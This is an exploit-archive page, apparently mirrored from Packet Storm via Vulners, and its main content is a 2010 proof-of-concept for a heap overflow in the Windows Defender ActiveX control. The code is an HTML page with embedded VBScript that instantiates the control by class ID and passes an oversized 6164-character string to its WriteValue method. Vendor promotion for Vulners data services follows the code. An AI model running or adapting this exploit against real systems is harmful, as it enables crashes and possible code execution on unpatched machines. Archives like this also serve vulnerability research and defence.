Lucene search
K

Microsoft Windows Defender Active-X Heap Overflow Version 2

🗓️ 20 Jan 2010 00:00:00Reported by sarbot511Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Microsoft Windows Defender Active-X Heap Overflow v2 exploi

Code
`#Aouther : [SarBoT511]  
#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]  
#downloads :[www.microsoft.com]  
#Date : [2010/01/19]  
#tested on :[windows 7]  
#Microsoft Windows Defender  
  
<html>  
<object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' ></object>  
<script language='vbscript'>  
targetFile = "C:\Program Files\Windows Defender\MsMpCom.dll"  
prototype = "Sub WriteValue ( ByVal bstrKeyName As String , ByVal bstrValueName As String , ByVal eType As _MP_COM_CONFIG_TYPE , ByVal varValue As Variant )"  
memberName = "WriteValue"  
progid = "MpComExportsLib.MsMpSimpleConfig"  
argCount = 4  
  
arg1=String(6164, "A")  
arg2="defaultV"  
arg3=1  
arg4="defaultV"  
  
target.WriteValue arg1 ,arg2 ,arg3 ,arg4   
  
</script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation